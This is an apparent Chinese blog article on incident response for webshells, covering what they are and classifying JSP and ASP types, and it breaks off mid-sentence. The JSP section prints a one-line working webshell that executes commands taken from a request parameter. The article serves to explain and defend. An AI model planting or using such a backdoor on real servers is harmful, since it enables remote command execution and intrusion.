WebShell网络安全应急响应策略
发布时间
阅读量:
阅读量
Webshell 概述
Webshell一般是指基于JSP、ASP、PHP等网页脚本文件形式存在的常见于服务器环境中的可执行程序。它常具有文件操作与命令执行能力,并属于一种后门程序。攻击者在入侵一个网站后,通常会将其隐藏在网站服务器Web目录下正常的网页文件中,并通过浏览器或专用客户端进行访问以实现对目标服务器的操作环境建立。
Webshell 分类
根据不同的脚本名称划分,常见的Webshell脚本类型有JSP、ASP、PHP等。
1.JSP型Webshell 脚本
JSP 全名为 JavaServer Pages ,是一种基于 Java 技术实现的动态 Web 开发工具。它通过在传统网页 HTML 文件(*.htm, .html)中嵌入 Java 程序段(scriptlet)以及 JSP 标记(tag),从而生成 JSP 文件(.jsp)。这种技术允许开发者通过简单的 HTML 代码实现复杂的动态功能,并通过 JShell 实现客户端与服务器之间的交互。
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
2.ASP型Webshell脚本
Active Server Pages(ASP)的全称为Active Server Pages。这是一种专为服务器开发使
全部评论 (0)
还没有任何评论哟~
